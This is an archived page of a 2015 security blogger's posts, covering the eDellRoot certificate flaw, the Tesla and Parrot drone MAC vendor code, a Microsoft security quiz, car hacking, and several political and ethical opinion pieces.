Monday, November 23, 2015

Some notes on the eDellRoot key

It was discovered this weekend that new Dell computers, as well as old ones with updates, come with a CA certificate ("eDellRoot") that includes the private key. This means hackers can eavesdrop on the SSL communications of Dell computers. I explain how in this blog post, just replace the "ca.key" with "eDellRoot.key".

If I were a black-hat hacker, I'd immediately go to the nearest big city airport and sit outside the international first class lounges and eavesdrop on everyone's encrypted communications. I suggest "international first class", because if they can afford $10,000 for a ticket, they probably have something juicy on their computer worth hacking.

I point this out in order to describe the severity of Dell's mistake. It's not a simple bug that needs to be fixed, it's a drop-everything and panic sort of bug. Dell needs to panic. Dell's corporate customers need to panic.

Note that Dell's spinning of this issue has started, saying that they aren't like Lenovo, because they didn't install bloatware like Superfish. This doesn't matter. The problem with Superfish wasn't the software, but the private key. In this respect, Dell's error is exactly as bad as the Superfish error.

Wednesday, November 04, 2015

We should all follow Linus's example

Yet another Linus rant has hit the news, where he complains about how "your shit code is fucking brain damaged". Many have complained about his rudeness, how it's unprofessional, and part of the culture of harassment in tech. They are wrong. Linus Torvalds is the nicest guy in tech. We should all try to be more like him.

The problem in tech isn't bad language ("your shit code"), but personal attacks ("you are shit").

A good example is Brendan Eich, who was fired from his position as Mozilla CEO because people disagreed with his political opinions. Another example is Nobel prize winner Tim Hunt who was fired because people took his pro-feminist comments out of context and painted him as a misogynist. Another example is Pax Dickinson, who was fired as CTO of Business Insider because of jokes he made before founding the company. A programmer named Curtis Yavin* was booted from a tech conference because he's some sort of monarchist. Yet more examples are the doxing and bomb threats that censor both sides of the GamerGate fiasco. The entire gamer community is a toxic cesspool of personal attacks. We have another class of people, the "SJW"s, who viciously attack those they disagree with, trying to get them fired. They treat those who make a mistake or disagree with them as an evil misogynists who needs to be punished, rather than as people who need to be corrected -- or debated.

What all these things have in common is that they attack the person. They strive to dehumanize the person, to make them an un-person, so that we stop empathizing with them. These attacks seek to intimidate and punish, not to educate or inform.

Linus punishes nobody. He intimidates nobody. He has that power, to act as a dictator to ban people for life from the Linux kernel, but doesn't use that power. Indeed, his use of power demonstrates extreme humility. Even in this case, he declares he doesn't "want" to accept the code into the kernel, not that he "won't".

His rant is designed to inform. The Linux kernel is a work of art based on certain consistent principles, such as not needlessly obfuscating implementation details. He takes the time to yet again lay out his philosophy that guides the kernel. Yes, his language is strong, but I'm not sure how else he'd communicate the unreasonableness of the code in question.

Personal attacks are increasingly the norm in our society. Pick any political debate -- the basis of people's arguments is not that the opposition is wrong, but that they are unreasonable and sub-human. Such discourse would improve if everyone emulated Linus's example, as we'd start debating the issues (albeit with course language) rather than attacking each other.

Seriously, try it. Can you debate issues like abortion, anti-vaxx, taxes, immigration, or global warming in such a way that it doesn't include dehumanizing personal attacks? Can you debate such issues with the overwhelming belief that your opponents are reasonable people? Linus displays that belief. You don't.

Linus could, of course, be even nicer. But the thing is, Linus doesn't ruin careers, unlike these harassers feted by WIRED

The Godwin fallacy

As Wikipedia says:
Godwin's law and its corollaries would not apply to discussions covering known mainstays of Nazi Germany such as genocide, eugenics, or racial superiority, nor to a discussion of other totalitarian regimes or ideologies, if that was the explicit topic of conversation, because a Nazi comparison in those circumstances may be appropriate, in effect committing the fallacist's fallacy, or inferring that an argument containing a fallacy must necessarily come to incorrect conclusions.
An example is a discussion whether waving the Confederate flags was "hate speech" or "fighting words", and hence undeserving of First Amendment protections.

Well, consider the famous march by the American Nazi party through Skokie, Illinois, displaying the Swastika flag, where 1 in 6 residents was a survivor of the Holocaust. The Supreme Court ruled that this was free-speech, that the Nazi's had a right to march.

Citing the Skokie incident isn't Godwin's Law. It's exactly the precedent every court will cite when deciding whether waving a Confederate flag is free-speech.

I frequently discuss totalitarianism, as it's something that cyberspace can both enable and defeat. Comparisons with other totalitarian regimes, notably Soviet Russia and Nazi Germany, are inevitable. They aren't Godwin hyperbole, they are on point. Those who quickly cite Godwin's Law are committing the "fallacist's fallacy", or the "Godwin's Fallacy".

Saturday, October 31, 2015

Prez: Rick Perry selling his mailing list

I created separate email accounts to receive email from each of the 25 presidential candidates (and donated money to all them). This allows me to track their behavior -- or misbehavior.

Rick Perry exited the race 50 days ago. Today, I got two emails to my special Perry address. One email was from Ted Cruz, another presidential candidate. The other was from Paul Ryan, the new Speaker of the House.

Here's Ted Cruz's email, sent to my Perry account. It's actually identical to one I received on my Cruz account. (I've hidden the To: address, except for the 'rick' part).

The email headers look like:

Received: from ( [])
 by projectp (Postfix) with ESMTP id 1266C26041B
 for ; Fri, 30 Oct 2015 16:28:59 +0000 (UTC)

Rick Perry uses the company "TargetedVictory" for his mass emailings, where Ted Cruz uses another company. This shows that Perry didn't give his address list to Cruz, but instead let Cruz use the address list.

I saved a copy of Perry's privacy policy when I made the donation. It implies that he won't give out my private information to somebody else, but nothing in the policy says he won't use my private information in this manner. I don't think it's changed, so you can read Rick Perry's privacy policy here and decide for yourself if this use of my private information is valid.

The other email was from Paul Ryan asking for donations to the NRCC. Apparently, the reason Paul Ryan took the job of Speaker was solely for the children.

What is the NRCC? I had to look it upon Wikipedia. It's a SuperPAC setup in 1866 to support House Republicans. They get a couple hundred million dollars in donations every year. There's a similar DCCC for the Democrats.

As a side note: Thunderbird claims this might be a "scam". I love the irony.

So why these emails from Perry? One answer could be money, that they paid him to use his mailing list. Another could be politics, that in exchange for pimping his donors, he could receive political consideration for other things, like being named ambassador or something. Thirdly, he could just be a nice guy who wants to see Republicans and his fellow Texan win.

My bet is this, that we'll see Perry officially endorse Ted Cruz in the next couple weeks, announced at some major event, timed to give Cruz a boost in the polls. If that's the case, then this would be an interesting lesson in how projects like this can scoop what's going on inside the campaigns.

Update: Comment thread over at Reddit:

Prez: donation numbers

I've given $10 to every candidate to monitor what they do. As I blogged before, just before the quarterly filing deadline, I got emails from all the candidates begging for money, to impress people how much money they've gathered. Well, here are amount each candidate received last quarter:


Of course Hillary and Bernie are at the top, since they are the only two major contenders on the Democrat side, so split the pool between them.

What's interesting is that how Scott Walker exited the race, and Jeb! scaled back his spending, because their donations dropped precipitously. Even though they got huge donations last quarter, they spent the money as fast as they could. Presidential campaigns are like venture capital that way: you spend money aggressively in order to make more money. If you are right, this strategy wins, if you are wrong, you go bankrupt quickly. (And going bankrupt quickly is preferable to being a zombie barely hanging in there).

Or, instead of the aggressive strategy, you could just play it cool for a bit, waiting for the press to get tired of Trump. As we say last election cycle, the press would suddenly get excited about a candidate for a bit, they'd shoot up in the polls, start to overspend, then the press would get bored, and their campaigns would go bankrupt. Those who lasted till the end were those who played a more conservative campaign. Maybe banking a bit of money now in order to tide you through the press's fickleness would be a good strategy.

Then there is the Rand Paul strategy. He's got a bunch of rabid followers (like me), so he can keep in the race until everyone has got tired of all the "normal" candidates. His father Ron used that strategy, and it works well.

Another way to look at candidate popularity (instead of polls and donations) is betting sites, as tracked by this site. While polls point to Trump and donations point to Carson, that site claims Rubio has the best chance of getting the Republican nomination by far. If you believe this is wrong, and if your beliefs are right, then you can go onto numerous online betting websites (including with Bitcoin) and make the appropriate bet.

In theory, online betting sides are the worst way to predict the winner. Yes, I said worst. That's because if there was enough liquidity in the market for them to be statistically valid, then there would also be enough liquidity for hedging. Consider Rubio. Now that he is leading among betters, he can then invest in betting on his competition. Should his campaign falter (donations drop, lose popularity), then the odds of his competitors will go up. He can thus sell those contracts and make a ton of money, enough to be overcome the drop in donations. Or, everyone can hedge their bets for candidates they know will be hostile to their interests. For example, all 1%ers should be buying contracts betting on Bernie Sanders winning. Sure, they'll lose money as Sanders taxes them to death, but they'll earn a lot of money at 10 to 1 odds on the betting sites.

There have been lots of article on the "wisdom of the crowds", but sadly, none have pointed out this hedging angle that makes their predictions inherently inaccurate.

Friday, October 30, 2015

Yes, the CNBC moderation was biased

In anger over CNBC's left-wing bias, the Republican party has suspended them from moderating future debates. Is there something to this?

Yes and no. CNBC, like most of the media, has a strong left-wing bias. On the other hand, the Republicans are quick to label legitimate criticism as examples of bias.

There is an easy way to detect improper bias. The principle of journalism is that there are two reasonable sides to any debate. One side may be wrong, of course, but both sides are reasonable. Partisan bias, however, involves arguing that one side in the debate is unreasonable. When the press calls somebody a "comic book clown", then it's bias. Merely saying they are "wrong" is not bias.

That's what happened many times during the CNBC moderated debate of Republican candidates, most egregiously when they called Trump a "comic book" version of a candidate. We all know that Trump is a demagogue, that he appeals to the ignorant masses more than intelligent people. But when you drill down on Trumps ideas, what you'll find is that he's usually merely wrong rather than irrational. For example, a couple months ago, Trump was attacked in the press for saying "the constitution is unconstitutional". Actually, if you looked at what Trump really said, in context, you'll find a quite reasonable interpretation of the 14th amendment. Not a likely "correct" interpretation, mind you, but still a "reasonable" one.

Moderators should attack Trump based on the assumption that he's reasonable. Everyone knows you can't deport all the illegal aliens in America without violating everyone's constitutional right to "due process". Does Trump propose suspending due process? Or does he have a concrete plan that'll prove everybody wrong? That's the question I'd ask him, instead of calling him a clown.

But it's not just with Trump where the moderators let their bias show. Another example was a question to Ben Carson on gay marriage. The left-wing press assumes that the Republican stance on gay marriage is due to bigotry, and hence, is unreasonable. That's not true.

Our society is quickly transitioning from a point when gays were ostracized to one where they are accepted. Democrats and Republicans handle this transition in different ways. As "conservatives", Republicans are of course going to handle this by being unwilling to change existing institutions. In particular, marriage has religious associations that Republicans are sensitive to. Had the national debate centered on "civil unions" instead of "gay marriage", as it did in France, you would have seen a very difference response from both Republicans and Democrats.

The CNBC moderator let his bias show by implicitly assuming Republicans were anti-gay bigots in his question to Carson:
MODERATOR: Why would you serve on a company whose policies [gay partner benefits] seem to run counter to your views on homosexuality?
CARSON: Well, obviously, you don't understand my views on homosexuality … [One] shouldn't automatically assume that because you believe that marriage is between one man and one woman that you are a homophobe.
In other words, Carson's response was that his views on homosexuality are not the unreasonable caricature drawn by the CNBC moderator, and that of course gays deserve the same rights as everyone else.

Despite what I said above, gay marriage is indeed cover for a lot of homophobia. Kim Davis is proof: her rampant adultery and four marriages are as far from any Christian definition of the institution as gay marriage. Debate moderators should probe this -- but based on the assumption Republicans are reasonable people and not bigots. An example might be:
Moderator (me): Last year, the RNC put out a video declaring that everyone is welcome in the Republican party: men, women, whites, blacks, hispanics, and so on. Yet they didn’t mention gays. Do Republicans welcome gays? If you get the Republican nomination, what will you do to make gays feel more welcome in the party?

A similar issue is climate change. Republicans don’t deny the scientific consensus behind climate change. They may be wrong, not taking the issue seriously enough, but they aren’t unreasonable people who deny science. But "denialism" is too attractive an argument for Democrats, and the left-wing media has seized upon it, clearly violating their own journalistic principles to make it true.

This bias is apparent in CNBC’s question:
Moderator: Governor Christie, you've said something that many in your party do not believe, which is that climate change is undeniable, that human activity contributes to it, and you said, quote: "The question is, what do we do to deal with it?".
Journalisticly, the moderator's claim that “many in [the] party do not believe” is unsupported by the available evidence. It's a weird thing, because everyone knows it's true, but when you go hunting for the evidence, you'll find it difficult to find. Instead, what you'll find are statements like these at ClimateProgress, which when twisted out of context seem to indicate denialism, but which don't explicitly deny that human acitivity contributes to climate change.

If I were a candidate, I’d prepare for this question with the following response:
Candidate (me): Point of order. You make the claim that many Republicans deny that human activity contributes to climate change. Of the 10 candidates on this stage, Mr. Moderator, how many of us do you think would deny this?
Candidate: Okay fellow candidates, raise your hand if you deny that human activity contributes to climate change.
Candidate: As you know, we Republicans often complain of media bias. What just happened demonstrates why. We want to have substantive debate on this issue, but you can’t stop calling us deniers.

The problem being discussed here is not that journalists believe Republicans to be wrong. Instead, the problem is that journalists believe the Republicans to be unreasonable. Despite the fact that Republicans are often too quick to label valid criticism as "bias", a problem does exist. In the CNBC hosted debate, several questions (as shown here) are based on the erroneous belief that Republicans are unreasonable rather than merely wrong.

Wednesday, October 28, 2015

OMG, the machines are breeding! Mankind is doomed! DOOMED!!!

My Tesla has the same MAC address vendor code as an AR Drone. These are two otherwise unrelated companies, yet they share the same DNA. Flying drones are mating with land-based autonomous vehicles. We are merely months away from Skynet gaining self-awareness and wiping out mankind.

You can see this in the screenshot below, were we see the output of a hacking program that monitors the raw WiFi traffic. The AR Drone acts as an access-point so that your iPhone can connect to it in order to fly the drone's controls. The Tesla, on the other hand, is looking for an access-point named "Tesla Service", so that when you drive it in for service, it'll automatically connect to their office and exchange data. As you can see, both devices have the same vendor code of "90:03:B7" for Parrot SA.

Here is a picture of the AR Drone cavorting with the car. The top arrow points to the drone, the bottom arrow points to the car.

So why the relationship? Why does the Tesla look like a drone on WiFi?

The company Parrot SA started out creating kits for cars that contain WiFi, Bluetooth, and voice control. Since they were already building embedded WiFi, they apparently used that expertise to make a flying drone controlled via WiFi (from an iPhone app). So while it seems odd that Parrot would sell both drones and automobile components, it's actually overlapping expertise.

Car companies like Tesla don't design everything themselves. Instead, the car is assembled from pieces built by other companies. The leather interior, for example, is made by a company that makes leather for other luxury cars. The paint is a standard automobile paint. Tesla just included the Parrot voice command and WiFi control unit instead of designing their own. I think even the the "autopilot" feature is software algorithms developed by another company. The only bits that are truly unique to Tesla are the batteries, the engine, and stamped aluminium car body.

The same is true throughout the spectrum of Internet-of-things, self-driving cars, and flying drones. All these products are assembled from the same industry base. For example, the nVidia Tegra chips in my Tesla are are the same as can be found in "June Intelligent Ovens". Why do ovens need advanced GPUs in order to display the temperate? I don't know, they just do, otherwise Skynet won't get enough compute power to become sentient.

Samy Kamkar has tool "SkyJack" for attacking drones. It identifies targets based on MAC address vendor code. Thus, his tool could potentially accidentally attack my car instead:

The point is this: the machine people are breeding out of control. This can only lead to disaster. Mankind is doomed.

Friday, October 23, 2015

Dumb, dumber, and cybersecurity

The reason you got hacked is because you listen to dumbasses about cybersecurity, like Microsoft.

An illustrative example is this article on "10 steps to protect" yourself. The vast majority of cyber threats to a small business are phishing, password reuse, and OWASP threats like SQL injection. That article addressed none of these threats.

But it gets better.

At the bottom of that article is a link to this "Cyber Security IQ" quiz at Microsoft's small-business website. The first question asks about password sharing. I show their "right" answer here:

Their correct answer is "None of the above", meaning that it's not okay to share your passwords with anybody. But this is nonsense. For your work account, of course it's okay to share your password with your boss. In fact, it's often necessary.

There have been several court cases where IT administrators have been fired, where the companies later found that the fired employee is the only one with passwords to certain critical systems. The (former) administrators were prosecuted for refusing to give their former bosses the passwords.

If your boss demands your password to your corporate accounts, of course you must give them your password.

But it gets better. Way better.

While answering the second question, this happened.
Whenever you visit this website, on pretty much any page as far as I can tell, you are going to get this popup asking to chat after a few minutes. At first I thought it was tied to this question (which would be clever), but it isn't -- it's a site-wide thing, unrelated to this quiz.

The correct answer to the underlying quiz questions is "Press Alt + F4", which closes the browser window.  That's because the unwanted popups will often position the [x] carefully in order to exploit "clickjacking" in your web browser. You should never click anywhere on a popup.

But of course, if you did hit Alt-F4 to close the window, you could never complete this "Cyber Security IQ" quiz, because you'd always get this popup.

Here's my point. The "10 steps" article and the "IQ" quiz are why we can't solve cybersecurity. They are created by marketing people with plausible sounding advice, like "make sure you have a firewall". The reason you get hacked is because you listen to this plausible advice, while ignoring the real problems you have. Phishing, password re-use, and SQL injection have been the most popular hacks for 15 years because everyone does cybersecurity the Microsoft way shown above, instead of actually paying attention to the problem. Among your cybersecurity plans you should have three documents entitled "How we stop phishing", "How we stop password re-use", and "How we stop OWASP Top 10". If you don't, you suck.

It could be that this popup is an obscenely clever trick into measuring your real IQ. But I tested it. No matter which webpage you go to on the site, after a few minutes this popup appears.

Ethics of killing Hitler

The NYTimes asks us: if we could go back in time and kill Hitler as a baby, would we do it? There's actually several questions here: emotional, moral, and ethical. Consider a rephrasing of the question to focus on the emotional question: could you kill a baby, even if you knew it would grow up and become Hitler?

But it's the ethical question that comes up the most often, and it has real-world use. It's pretty much the question Edward Snowden faced: should he break his oath and disclose the NSA's mass surveillance of Americans?

I point this out because my ethical response is "yes, and go to jail". The added "and go to jail" makes it a rare response -- lots of people are willing to kill Hitler if they don't suffer any repercussions.

For me, the hypothetical question is "If you went back in time and killed Hitler, would you go to jail for murder?". My answer is "yes". I'd still do my best to lessen the punishment. I'd hire the best lawyer to defend me. It's just that I would put judgement of my crime or heroism in the hands of others. I would pay the consequences, whatever they were.

Another way of looking at the question is: "If you had a time machine, is killing Hitler the best option?". Maybe if you sent a hot chick back in time to get Hitler laid as a teenager, he wouldn't be so angry at the world. Maybe if you went back in time and purchased his crappy paintings, or hired him as an architect, you could steer his life onto another path. Seriously, the time stream is full of butterflies that simply need to flap their wings in order to divert Hitler from genocide.

I point this out because it's "murder" that is the question, and Hitler is only window dressing.

There is a cybersecurity bill, "CISA", in front of congress right now that will be voted on next week. But "cybersecurity" is only the window dressing. The tech industry and cybersecurity experts oppose it. Its only supporters are the intelligence community, like the FBI and NSA. It's really a disguised surveillance bill. Just like people seem uninterested in stopping Hitler through some means other than murder, government is uninterested in stopping hackers through some other means than mass surveillance and a police state.

Anyway, those are my two answers to the "kill Hitler" question. If I had a time machine, my first choice wouldn't be "murder". If I did choose "murder", I'd expect to go to jail for it.

Thursday, October 22, 2015

Car hacking is as fake as the moonlanding

How can the flag stay up? There's
no wind on the moon!! #fake
David Pogue at the Scientific American has an article claiming that hacking cars is "nearly impossible" and "hypothetical", using the same sorts of arguments crazies use trying to prove the moon landing was faked.

Of course, "hacking a car" probably doesn't happen as the public imagines. Delving into the details, you'll find things you didn't expect. It's like the stars in pictures at the moon landing. Because of contrast issues with the bright foreground, the dim stars disappear. This has led to crazies saying the lack of stars are proof that the moon landings were faked, because they don't understand this technical issue. Similarly, Pogue claims car hacking is fake because the technical details don't match his ignorant prejudices.

Pogue's craziest claim is that the Jeep hack is fake because Jeep fixed the issue. Nobody can hack a Jeep as the researchers claim. But that's because the researchers proved to Jeep that it was possible, and gave time for Jeep to fix the problem. It's like claiming the 9/11 terrorist attacks are purely hypothetical, because the Twin Towers of the World Trade Center no longer exist.

The misunderstanding here is that Pogue believes the hack was a one time thing, that now that Jeep fixed the problem, no more hacks will be possible in the future.

The reality is that this hack proves that a whole new class of bugs exist. You don't patch your iPhone or Windows laptop once. Instead, you've been updating your iPhone and Windows computer once a month for over a decade because new hacks keep getting discovered. The relevance of the "car hacking" research is that cars are enormously complex computers full of flaws. It's a message that nobody will pay attention to until the first set of flaws are published. Now that those flaws have been exposed, it'd be insane to continue to ignore this message and pretend future flaws won't be found. Pogue is that insane.

The consequence is manifold. It means that car makers need to find an easier way to regularly update their software rather than the traditional "recall" process of taking the car to dealer and leaving it there for a few days. It means car makers need to change how they develop software, getting rid of the obvious bugs they have now (such as putting Jeeps on the Internet so that anybody can scan and find them).

This is the battle of cybersec. The issues are clear and obvious to us, yet we are unable to overcome the obstinate ignorance as demonstrated in Pogue's post.

Disclaimer of reasonableness: It's impolite to accuse an otherwise reasonable person as being one of those "fake moon landing" nuts. Indeed, he makes a cogent point that many will misinterpret things and be too fearful of car hacking. Automobile related deaths are unlikely to have a statistical increase due to car hacking. He's not crazy. However, Pogue is profoundly ignorant of the issue, his strong assertions are not born out by the facts, and this is indeed a danger that needs to be addressed. I don't know how to communicate the profoundness of his error without comparing it something like the moon landing.

Update: Many have argued Chris Valasek and Charlie Miller went too far, demonstrating their hack on a live freeway. They claim it would've been just as believable on a racetrack instead. Pogue article proves this wrong. It means Pogue would've added to his article "It wasn't in real traffic conditions, but only on a racetrack". We experts see no essential difference, but the ignorant like Pogue do. Obviously, Valasek and Miller didn't go far enough.